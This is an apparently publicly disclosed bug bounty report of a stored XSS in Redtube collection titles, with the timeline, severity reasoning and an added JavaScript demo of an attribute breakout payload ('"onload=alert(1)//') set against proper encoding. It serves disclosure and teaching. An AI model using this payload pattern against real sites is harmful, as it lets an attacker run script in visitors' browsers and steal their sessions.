Stored XSS on the https://www.redtube.com/users/[profile]/collections
State Resolved (Closed)
Disclosed publicly 2018-10-10T14:56:36.525Z
Reported To Redtube
Weakness Cross-site Scripting (XSS) - Stored
Bounty $1,500
Summary by sp1d3rs

Stored XSS on the /users/<username>/collections and /users/<username>/favorites endpoints with the same root cause. Discovered on the day of the public program launch.
Request interception wasn't necessary.

Context:

<img src="..." alt="[injection]">

Sanitized characters:

<>

Payload:

"onload=[js]//

Severity was set based on factors such as: the number of potential users affected, attack complexity, no user interaction required, and the possibility of stealing sensitive information or bypassing CSRF protection on the user's side.
I previously had some experience with the triage team, so in this case it was enough to demonstrate a simple popup, without a complex payload.
Thanks to the team for great report handling and bounty!
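The attribute-context breakout described above, as an added example that is not code from the original report or from the site. It models the filter the report describes (only `<` and `>` removed), shows why a double quote is enough to escape the `alt` value and append an `onload` handler, and contrasts it with proper attribute encoding. The renderer, the `/thumb.jpg` path and all function names are assumptions made for this illustration.

```javascript
// Added example, not code from the original report or from the site: a model of
// the attribute-context injection described above. The renderer, the "/thumb.jpg"
// path and the function names are assumptions made for this illustration.

// The filter the report describes: only "<" and ">" are removed. Inside a quoted
// attribute value that is not enough, because a double quote closes the value.
function stripAngleBrackets(s) {
  return s.replace(/[<>]/g, "");
}

// The fix: encode every character that can change meaning inside an attribute
// value, so the title can never close the alt attribute.
function encodeAttr(s) {
  const map = { "&": "&amp;", '"': "&quot;", "'": "&#x27;", "<": "&lt;", ">": "&gt;" };
  return s.replace(/[&"'<>]/g, (c) => map[c]);
}

// The vulnerable pattern: the user-supplied collection title is interpolated
// into the alt attribute of an <img> on the collections/favorites page.
function renderThumbnail(title, sanitize) {
  return `<img src="/thumb.jpg" alt="${sanitize(title)}">`;
}

// A small attribute tokenizer that follows the browser's rules closely enough
// for this case: a quoted value ends at its matching quote, an unquoted value
// ends at whitespace or ">", and whatever follows a closed value starts the
// next attribute name.
function parseAttributes(tagText) {
  const attrs = {};
  const re = /([^\s="'>\/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]*)))?/g;
  let m;
  while ((m = re.exec(tagText)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? "";
  }
  return attrs;
}

// Names of event-handler attributes (on...) that ended up on the rendered <img>.
function injectedHandlers(title, sanitize) {
  const html = renderThumbnail(title, sanitize);
  const tag = html.match(/<img\b([^>]*)>/);
  if (!tag) return [];
  return Object.keys(parseAttributes(tag[1])).filter((n) => n.startsWith("on"));
}

// The payload shape from the report, with a simple popup as the JavaScript.
const payload = '"onload=alert(1)//';

console.log(renderThumbnail(payload, stripAngleBrackets));
// <img src="/thumb.jpg" alt=""onload=alert(1)//">  -> handler fires when the image loads
console.log(injectedHandlers(payload, stripAngleBrackets)); // [ 'onload' ]
console.log(renderThumbnail(payload, encodeAttr));
// <img src="/thumb.jpg" alt="&quot;onload=alert(1)//">  -> title is inert text
console.log(injectedHandlers(payload, encodeAttr)); // []
```

The trailing `//` in the payload turns the filter's own closing quote into a JavaScript comment, so the handler body stays syntactically valid. Because `onload` runs as soon as the thumbnail loads, any visitor to the collections page executes it without clicking anything, which is the "no user interaction" factor cited in the severity rationale.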

Summary by Redtube

Researcher successfully closed the image 'alt' attribute and injected javascript by submitting an XSS payload as the collection title. This led to stored cross-site scripting on the user's collections page, executed against any users who visited the user's collections. The user's favorites page was also affected if the collection featuring the payload was present.

Timeline
sp1d3rs submitted a report to Redtube.
2018-07-10T16:20:56.267Z

Regards,
Frans

dsimmons Activities::BugTriaged
2018-07-10T20:33:20.100Z


sp1d3rs Activities::Comment
2018-07-11T00:24:56.040Z


Activities::BountyAwarded
2018-07-24T16:20:49.847Z


ghooks Activities::BugResolved
2018-09-11T08:56:30.614Z


sp1d3rs Activities::AgreedOnGoingPublic
2018-09-16T23:49:05.941Z


dsimmons Activities::AgreedOnGoingPublic
2018-10-10T14:56:36.473Z


dsimmons Activities::ReportBecamePublic
2018-10-10T14:56:36.542Z